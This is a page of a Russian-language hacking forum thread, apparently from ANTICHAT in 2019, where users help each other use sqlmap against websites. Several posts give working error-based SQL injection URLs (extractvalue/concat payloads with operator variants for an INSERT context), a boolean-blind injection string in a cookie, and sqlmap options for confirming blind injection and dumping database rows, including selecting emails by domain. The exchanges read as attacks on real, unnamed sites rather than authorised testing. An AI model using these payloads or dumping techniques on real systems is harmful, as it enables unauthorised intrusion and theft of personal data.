HOME FORUMS MEMBERS RECENT POSTS LOG IN  
× Авторизация
Имя пользователя:
Пароль:
Нет аккаунта? Регистрация
Баннер 1   Баннер 2

ANTICHAT — форум по информационной безопасности, OSINT и технологиям

ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию. Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club, и теперь снова доступен на новом адресе — forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
Вернуться   Форум АНТИЧАТ > БЕЗОПАСНОСТЬ И УЯЗВИМОСТИ > Уязвимости
Перезагрузить страницу Вопросы по SQLMap
   
Ответ
Страница 92 из 115 « Первая < 4282 88 89 90 91 92 93 94 95 96 102 > Последняя »
 
Опции темы Поиск в этой теме Опции просмотра

  #1  
Старый 05.08.2019, 12:47
b3
Постоянный
Регистрация: 05.12.2004
Сообщений: 647
Провел на форуме:
1698585

Репутация: 818


По умолчанию
Цитата:
Сообщение от LeninDie  

привет. подскажите как мапу указать на то какие данные меняются? скуля слепая
у вас ответ а не запрос
 
Ответить с цитированием

  #2  
Старый 05.08.2019, 14:04
LeninDie
Познающий
Регистрация: 26.12.2015
Сообщений: 34
Провел на форуме:
12479

Репутация: 2
По умолчанию
Цитата:
Сообщение от b3  

у вас ответ а не запрос
дополнил
 
Ответить с цитированием

  #3  
Старый 06.08.2019, 20:23
BigBear
Новичок
Регистрация: 04.12.2008
Сообщений: 11
Провел на форуме:
69033

Репутация: 8
По умолчанию
Цитата:
Сообщение от BenderMR  

День добрый, господа.
Есть такая скуль:
Код:
https://site:com/?p1=v1&p2=v2&p3=v3&p4=v4%27,%20extractvalue(0x0a,concat/**/(0x0a,(select%20database()))))--+-
Где вроде как insert statement, потому что если после ' не добавить еще один параметр через запятую, то выдается такая ошибка:
Код:
Column count doesn't match value count at row 1
Подскажите, реально ли такое засунуть в мап и как это сделать?
Делайте через

Код:
https://site:com/?p1=v1&p2=v2&p3=v3&p4=v4%27*extractvalue(0x0a,concat/**/(0x0a,(select%20database()))))--+-

https://site:com/?p1=v1&p2=v2&p3=v3&p4=v4%27-extractvalue(0x0a,concat/**/(0x0a,(select%20database()))))--+-

https://site:com/?p1=v1&p2=v2&p3=v3&p4=v4%27/extractvalue(0x0a,concat/**/(0x0a,(select%20database()))))--+-
и вариации
 
Ответить с цитированием

  #4  
Старый 07.08.2019, 11:04
LeninDie
Познающий
Регистрация: 26.12.2015
Сообщений: 34
Провел на форуме:
12479

Репутация: 2
По умолчанию
Цитата:
Сообщение от LeninDie  

привет. подскажите как мапу указать на то какие данные меняются? скуля слепая
в куках уязвим параметр identifyId: amplitude_idundefined={"optOut":false,"sessionId": null,"lastEventTime":null,"eventId":0,"identifyId" :027179381' or 3726=3726--,"sequenceNumber":0} я так понимаю нужно добавить --string="а вот что здесь хз"

может кто нибудь подсказать решение?
 
Ответить с цитированием

  #5  
Старый 07.08.2019, 11:38
Baskin-Robbins
Участник форума
Регистрация: 15.09.2018
Сообщений: 236
Провел на форуме:
92829

Репутация: 212
По умолчанию
Цитата:
Сообщение от LeninDie  

может кто нибудь подсказать решение?
Ищи строку, которая всегда присутствует на неижектированной странице и неизменна(обязательно), но отсутствует при внедрении и false ответе

Если добавляется какая-либо строка при false то использовать нужно --not-string="bsdhbhsb" , но при условии если она отсутствует при тру ответе

По крайней мере так написано в манах
 
Ответить с цитированием

  #6  
Старый 07.08.2019, 16:24
BenderMR
Познающий
Регистрация: 23.02.2019
Сообщений: 65
Провел на форуме:
22457

Репутация: 10
По умолчанию
Цитата:
Сообщение от LeninDie  

может кто нибудь подсказать решение?
Ты скидывешь скрин ответа, нужен скрин запроса
 
Ответить с цитированием

  #7  
Старый 14.09.2019, 00:30
Estet
Познающий
Регистрация: 30.08.2016
Сообщений: 34
Провел на форуме:
12641

Репутация: 0
По умолчанию
Такой вопрос.

Есть колонка Type допустим, строк 100к+, практически везде колонка пустая, но в некоторых есть данные.

Можно ли как то сдампить только те что содержат данные?

Какие там данные я не знаю, так можно было бы --where указать
 
Ответить с цитированием

  #8  
Старый 14.09.2019, 00:42
Baskin-Robbins
Участник форума
Регистрация: 15.09.2018
Сообщений: 236
Провел на форуме:
92829

Репутация: 212
По умолчанию
Цитата:
Сообщение от Estet  

Такой вопрос.
Есть колонка Type допустим, строк 100к+, практически везде колонка пустая, но в некоторых есть данные.
Можно ли как то сдампить только те что содержат данные?
Какие там данные я не знаю, так можно было бы --where указать
where=Type != NULL

или так

where=Type != ''
 
Ответить с цитированием

  #9  
Старый 14.09.2019, 01:09
Estet
Познающий
Регистрация: 30.08.2016
Сообщений: 34
Провел на форуме:
12641

Репутация: 0
По умолчанию
Спасибо за помощь. Еще один, последний вопрос.

Можно ли как то указать подобную конструкцию --where=email=.....@site.com

Тоесть сдампить по электронке на указаном домене?
 
Ответить с цитированием

  #10  
Старый 14.09.2019, 01:32
Baskin-Robbins
Участник форума
Регистрация: 15.09.2018
Сообщений: 236
Провел на форуме:
92829

Репутация: 212
По умолчанию
Цитата:
Сообщение от Estet  

Спасибо за помощь. Еще один, последний вопрос.
Можно ли как то указать подобную конструкцию --where=email=.....@site.com
Тоесть сдампить по электронке на указаном домене?
--where=email LIKE '%@site.com'

но не уверен, сейчас проверил на sqlmap - не хочет работать, хотя вручную все работает
 
Ответить с цитированием
Ответ
Страница 92 из 115 « Первая < 4282 88 89 90 91 92 93 94 95 96 102 > Последняя »



« Предыдущая тема | Следующая тема »


Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT ™ © 2001- Antichat Kft.